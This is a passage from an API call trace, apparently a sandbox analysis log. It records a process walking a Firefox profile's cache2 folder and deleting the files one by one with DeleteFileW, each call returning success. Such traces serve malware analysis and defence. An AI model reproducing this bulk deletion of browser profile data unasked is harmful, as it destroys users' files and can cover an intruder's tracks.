(lpString="1A7C641FFE043BB811768257AF97546A0C7F3B55") returned 40 [0253.548] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1A7C641FFE043BB811768257AF97546A0C7F3B55" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1A7C641FFE043BB811768257AF97546A0C7F3B55") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1A7C641FFE043BB811768257AF97546A0C7F3B55" [0253.548] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1A7C641FFE043BB811768257AF97546A0C7F3B55" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1a7c641ffe043bb811768257af97546a0c7f3b55")) returned 1 [0253.549] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.549] lstrlenW (lpString="1AA5AFB1639FED28192BC2781A550C89494CDF9A") returned 40 [0253.549] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1AA5AFB1639FED28192BC2781A550C89494CDF9A" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1AA5AFB1639FED28192BC2781A550C89494CDF9A") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1AA5AFB1639FED28192BC2781A550C89494CDF9A" [0253.549] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1AA5AFB1639FED28192BC2781A550C89494CDF9A" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1aa5afb1639fed28192bc2781a550c89494cdf9a")) returned 1 [0253.550] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.550] lstrlenW (lpString="1ADEB94741EA84BB04219DA402BBC420B5512A2A") returned 40 [0253.550] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1ADEB94741EA84BB04219DA402BBC420B5512A2A" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1ADEB94741EA84BB04219DA402BBC420B5512A2A") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1ADEB94741EA84BB04219DA402BBC420B5512A2A" [0253.550] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1ADEB94741EA84BB04219DA402BBC420B5512A2A" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1adeb94741ea84bb04219da402bbc420b5512a2a")) returned 1 [0253.551] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.551] lstrlenW (lpString="1C7A6CE17940A6C75210FA60C52339417DEDEEFA") returned 40 [0253.551] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1C7A6CE17940A6C75210FA60C52339417DEDEEFA" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1C7A6CE17940A6C75210FA60C52339417DEDEEFA") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1C7A6CE17940A6C75210FA60C52339417DEDEEFA" [0253.551] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1C7A6CE17940A6C75210FA60C52339417DEDEEFA" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1c7a6ce17940a6c75210fa60c52339417dedeefa")) returned 1 [0253.553] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.553] lstrlenW (lpString="1C849477DE15B1F8F2245945F3F44468F58146DF") returned 40 [0253.553] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1C849477DE15B1F8F2245945F3F44468F58146DF" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1C849477DE15B1F8F2245945F3F44468F58146DF") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1C849477DE15B1F8F2245945F3F44468F58146DF" [0253.553] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1C849477DE15B1F8F2245945F3F44468F58146DF" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1c849477de15b1f8f2245945f3f44468f58146df")) returned 1 [0253.580] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.580] lstrlenW (lpString="1D719B3EE2A34A4E2DC9D0A4EAE1DF7948EA5A46") returned 40 [0253.580] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1D719B3EE2A34A4E2DC9D0A4EAE1DF7948EA5A46" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1D719B3EE2A34A4E2DC9D0A4EAE1DF7948EA5A46") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1D719B3EE2A34A4E2DC9D0A4EAE1DF7948EA5A46" [0253.580] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1D719B3EE2A34A4E2DC9D0A4EAE1DF7948EA5A46" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1d719b3ee2a34a4e2dc9d0a4eae1df7948ea5a46")) returned 1 [0253.581] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.583] lstrlenW (lpString="1D8C7F5B73A4CD02E54F20A75B1FC29BE8E2EE8B") returned 40 [0253.583] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1D8C7F5B73A4CD02E54F20A75B1FC29BE8E2EE8B" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1D8C7F5B73A4CD02E54F20A75B1FC29BE8E2EE8B") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1D8C7F5B73A4CD02E54F20A75B1FC29BE8E2EE8B" [0253.583] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1D8C7F5B73A4CD02E54F20A75B1FC29BE8E2EE8B" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1d8c7f5b73a4cd02e54f20a75b1fc29be8e2ee8b")) returned 1 [0253.584] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.584] lstrlenW (lpString="1D94118C6FBA173AC2CE7C335C3CB9B7365F1E90") returned 40 [0253.584] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1D94118C6FBA173AC2CE7C335C3CB9B7365F1E90" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1D94118C6FBA173AC2CE7C335C3CB9B7365F1E90") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1D94118C6FBA173AC2CE7C335C3CB9B7365F1E90" [0253.584] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1D94118C6FBA173AC2CE7C335C3CB9B7365F1E90" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1d94118c6fba173ac2ce7c335c3cb9b7365f1e90")) returned 1 [0253.586] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.586] lstrlenW (lpString="1DBC56BBF48819D9CC9E96F72309A2D366DD1B72") returned 40 [0253.586] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1DBC56BBF48819D9CC9E96F72309A2D366DD1B72" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1DBC56BBF48819D9CC9E96F72309A2D366DD1B72") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1DBC56BBF48819D9CC9E96F72309A2D366DD1B72" [0253.586] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1DBC56BBF48819D9CC9E96F72309A2D366DD1B72" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1dbc56bbf48819d9cc9e96f72309a2d366dd1b72")) returned 1 [0253.587] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.587] lstrlenW (lpString="1DCB6E830B5F6182674047BC07BE94E869A82DC1") returned 40 [0253.587] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1DCB6E830B5F6182674047BC07BE94E869A82DC1" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1DCB6E830B5F6182674047BC07BE94E869A82DC1") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1DCB6E830B5F6182674047BC07BE94E869A82DC1" [0253.587] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1DCB6E830B5F6182674047BC07BE94E869A82DC1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1dcb6e830b5f6182674047bc07be94e869a82dc1")) returned 1 [0253.594] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.594] lstrlenW (lpString="1E4C1DE6D9BC3C738CB37D3D4E0CCCDBDD4EC3E7") returned 40 [0253.594] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1E4C1DE6D9BC3C738CB37D3D4E0CCCDBDD4EC3E7" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1E4C1DE6D9BC3C738CB37D3D4E0CCCDBDD4EC3E7") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1E4C1DE6D9BC3C738CB37D3D4E0CCCDBDD4EC3E7" [0253.594] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1E4C1DE6D9BC3C738CB37D3D4E0CCCDBDD4EC3E7" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1e4c1de6d9bc3c738cb37d3d4e0cccdbdd4ec3e7")) returned 1 [0253.597] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.597] lstrlenW (lpString="1E654765DD4C0B7A97A94BA7430FF4F02539B4D4") returned 40 [0253.597] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1E654765DD4C0B7A97A94BA7430FF4F02539B4D4" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1E654765DD4C0B7A97A94BA7430FF4F02539B4D4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1E654765DD4C0B7A97A94BA7430FF4F02539B4D4" [0253.597] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1E654765DD4C0B7A97A94BA7430FF4F02539B4D4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1e654765dd4c0b7a97a94ba7430ff4f02539b4d4")) returned 1 [0253.597] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.597] lstrlenW (lpString="1EB2E405E2B5AFF18DBD87BBFB385EED242A1AB5") returned 40 [0253.597] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1EB2E405E2B5AFF18DBD87BBFB385EED242A1AB5" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1EB2E405E2B5AFF18DBD87BBFB385EED242A1AB5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1EB2E405E2B5AFF18DBD87BBFB385EED242A1AB5" [0253.597] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1EB2E405E2B5AFF18DBD87BBFB385EED242A1AB5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1eb2e405e2b5aff18dbd87bbfb385eed242a1ab5")) returned 1 [0253.598] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.598] lstrlenW (lpString="1F03C5BEB6690C5E65013ADC12747A8FB0266E74") returned 40 [0253.598] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1F03C5BEB6690C5E65013ADC12747A8FB0266E74" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1F03C5BEB6690C5E65013ADC12747A8FB0266E74") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1F03C5BEB6690C5E65013ADC12747A8FB0266E74" [0253.598] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1F03C5BEB6690C5E65013ADC12747A8FB0266E74" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1f03c5beb6690c5e65013adc12747a8fb0266e74")) returned 1 [0253.599] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.599] lstrlenW (lpString="1F101A980B722E67F1FB3F0366EA9E520FB47D1B") returned 40 [0253.599] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1F101A980B722E67F1FB3F0366EA9E520FB47D1B" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1F101A980B722E67F1FB3F0366EA9E520FB47D1B") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1F101A980B722E67F1FB3F0366EA9E520FB47D1B" [0253.599] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1F101A980B722E67F1FB3F0366EA9E520FB47D1B" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1f101a980b722e67f1fb3f0366ea9e520fb47d1b")) returned 1 [0253.600] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.600] lstrlenW (lpString="1F58B2F46F6C2DE8FF822405AC18A18128D0BBBC") returned 40 [0253.600] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="1F58B2F46F6C2DE8FF822405AC18A18128D0BBBC" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1F58B2F46F6C2DE8FF822405AC18A18128D0BBBC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1F58B2F46F6C2DE8FF822405AC18A18128D0BBBC" [0253.600] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\1F58B2F46F6C2DE8FF822405AC18A18128D0BBBC" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\1f58b2f46f6c2de8ff822405ac18a18128d0bbbc")) returned 1 [0253.601] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.601] lstrlenW (lpString="20343A86FB834223CC13D33560122837208F7563") returned 40 [0253.601] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="20343A86FB834223CC13D33560122837208F7563" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\20343A86FB834223CC13D33560122837208F7563") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\20343A86FB834223CC13D33560122837208F7563" [0253.601] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\20343A86FB834223CC13D33560122837208F7563" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\20343a86fb834223cc13d33560122837208f7563")) returned 1 [0253.602] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.602] lstrlenW (lpString="209D12DF1554481FBDC90931601991A892F798E7") returned 40 [0253.602] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="209D12DF1554481FBDC90931601991A892F798E7" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\209D12DF1554481FBDC90931601991A892F798E7") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\209D12DF1554481FBDC90931601991A892F798E7" [0253.602] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\209D12DF1554481FBDC90931601991A892F798E7" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\209d12df1554481fbdc90931601991a892f798e7")) returned 1 [0253.604] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.604] lstrlenW (lpString="2118755562A693569EE2423CB1A2136CB8F1D9CC") returned 40 [0253.604] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2118755562A693569EE2423CB1A2136CB8F1D9CC" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2118755562A693569EE2423CB1A2136CB8F1D9CC") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2118755562A693569EE2423CB1A2136CB8F1D9CC" [0253.604] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2118755562A693569EE2423CB1A2136CB8F1D9CC" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2118755562a693569ee2423cb1a2136cb8f1d9cc")) returned 1 [0253.605] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.605] lstrlenW (lpString="212CB67D7B36A171AAF7F0B1E24E5ADC687ACDCF") returned 40 [0253.605] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="212CB67D7B36A171AAF7F0B1E24E5ADC687ACDCF" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\212CB67D7B36A171AAF7F0B1E24E5ADC687ACDCF") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\212CB67D7B36A171AAF7F0B1E24E5ADC687ACDCF" [0253.605] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\212CB67D7B36A171AAF7F0B1E24E5ADC687ACDCF" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\212cb67d7b36a171aaf7f0b1e24e5adc687acdcf")) returned 1 [0253.606] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.606] lstrlenW (lpString="2144C082C2AC8FA4FB4863D9D3BE7E335DD2C91D") returned 40 [0253.606] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="2144C082C2AC8FA4FB4863D9D3BE7E335DD2C91D" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2144C082C2AC8FA4FB4863D9D3BE7E335DD2C91D") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2144C082C2AC8FA4FB4863D9D3BE7E335DD2C91D" [0253.606] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\2144C082C2AC8FA4FB4863D9D3BE7E335DD2C91D" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\2144c082c2ac8fa4fb4863d9d3be7e335dd2c91d")) returned 1 [0253.607] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.607] lstrlenW (lpString="21870284BD46D6F21E756FF12837E26AC55D301D") returned 40 [0253.607] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="21870284BD46D6F21E756FF12837E26AC55D301D" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\21870284BD46D6F21E756FF12837E26AC55D301D") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\21870284BD46D6F21E756FF12837E26AC55D301D" [0253.607] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\21870284BD46D6F21E756FF12837E26AC55D301D" (normalized: 